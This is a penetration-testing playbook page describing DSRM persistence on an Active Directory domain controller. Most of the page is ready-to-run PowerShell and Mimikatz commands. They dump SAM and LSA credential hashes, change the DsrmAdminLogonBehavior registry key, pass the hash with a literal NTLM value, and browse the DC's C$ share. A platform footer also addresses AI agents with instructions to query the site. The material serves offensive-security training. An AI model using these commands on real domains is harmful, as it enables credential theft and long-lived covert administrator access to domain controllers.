> For the complete documentation index, see [llms.txt](https://playbook.sidthoviti.com/llms.txt). Markdown versions of documentation pages are available by appending `.md` to page URLs; this page is available as [Markdown](https://playbook.sidthoviti.com/active-directory-pentest/persistence/dsrm.md). # DSRM ## DSRM (Directory Services Restore Mode) * When the AD domain services does not boot, it uses a safe mode called DSRM that uses a local administrator user on DC called "Administrator" who's password is the DSRM password. * DSRM password (SafeModePassword) is required when a server is promoted to DC and it is rarely changed. After altering the config on the DC, it is possible to pass the NTLM hash of this user to access the DC. * This is longest persistence method. * The domain DPAPI backup key can be used to decrypt DPAPI protected credentials for any user. Dump credentials (requires DA privs) {% code overflow="wrap" %} ```powershell # Copy InvokeMimi to DC $sess = New-PSSession dcorp-dc Enter-PSSession -Session $sess Invoke-Command -FilePath C:\AD\Tools\Invoke-Mimi.ps1 -Session $sess Invoke-Mimikatz -Command '"token::elevate" "lsadump::sam"' -Computername dcorp-dc ``` {% endcode %} Compare the Administrator hash with the Administrator hash of below command: ```powershell Invoke-Mimikatz -Command '"lsadump::lsa /patch"' -Computername dcorp-dc ``` First one is the DSRM local Adminstrator. Since it is local admin of the DC, we can pass the hash to authenticate. Before PTH, we need to change the Logon Behavior for the DSRM account (very noisy) {% code overflow="wrap" %} ```powershell Enter-PSSession -Computername dcorp-dc #Check if the key exists and get the value Get-ItemProperty "HKLM:\SYSTEM\CURRENTCONTROLSET\CONTROL\LSA" -name DsrmAdminLogonBehavior # Change Registry key on DC New-ItemProperty "HKLM:\System\CurrentControlSet\Control\Lsa\" -Name "DsrmAdminLogonBehavior" -Value 2 -PropertyType DWORD ``` {% endcode %} Pass the hash {% code overflow="wrap" %} ```powershell # On attacker machine Invoke-Mimikatz -Command '"sekurlsa::pth /domain:dcorp-dc /user:Administrator /ntlm:a102ad5753f4c441e3af31c97fad86fd /run:powershell.exe"' # Or access C$ ls \\dcorp-dc\C$ ``` {% endcode %} --- # Agent Instructions This documentation is published with GitBook. GitBook is the documentation platform designed so that both humans and AI agents can read, navigate, and reason over technical content effectively. Learn more at gitbook.com. ## Querying This Documentation If you need additional information that is not directly available in this page, you can query the documentation dynamically by asking a question. Perform an HTTP GET request on the current page URL with the `ask` query parameter, and the optional `goal` query parameter: ``` GET https://playbook.sidthoviti.com/active-directory-pentest/persistence/dsrm.md?ask=&goal= ``` `ask` is the immediate question: it should be specific, self-contained, and written in natural language. `goal` is optional and describes the broader end goal you are ultimately trying to accomplish on behalf of the user. GitBook uses it to tailor the answer towards what is most useful for that goal. The response will contain a direct answer to the question and relevant excerpts and sources from the documentation. Use this mechanism when the answer is not explicitly present in the current page, you need clarification or additional context, or you want to retrieve related documentation sections.